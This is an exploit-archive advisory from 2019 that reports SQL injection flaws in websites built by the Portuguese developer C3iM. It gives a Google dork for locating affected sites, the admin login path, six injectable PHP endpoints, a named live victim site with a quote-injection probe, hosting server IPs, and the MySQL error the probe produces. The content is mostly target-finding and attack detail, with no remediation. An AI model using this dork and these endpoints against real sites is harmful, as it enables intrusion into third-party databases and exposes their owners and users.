facebook facebook twitter rss

C3iM SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
#########################################################

# Exploit Title : C3iM SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/01/2019
# Vendor Homepage : c3im.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido C3iM'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

#########################################################

# Admin Panel Login Path :
*************************
/admin

# SQL Injection Exploit :
***********************

/associados_id.php?id=[SQL Injection]

/conteudo.php?id=[SQL Injection]

/new.php?id=[SQL Injection]

/content.php?id=[SQL Injection]

/event.php?id=[SQL Injection]

/noticia.php?id=[SQL Injection]

#########################################################

# Example Vulnerable Site :
*************************

[+] danotec.pt/conteudo.php?id=1%27 =>

[ Proof of Concept ] => archive.is/BcJYk

Note : (192.185.106.107) => There are 104 domains hosted on this server.

Note : (192.185.86.89) => There are 174 domains hosted on this server.

#########################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################

Like us on Facebook :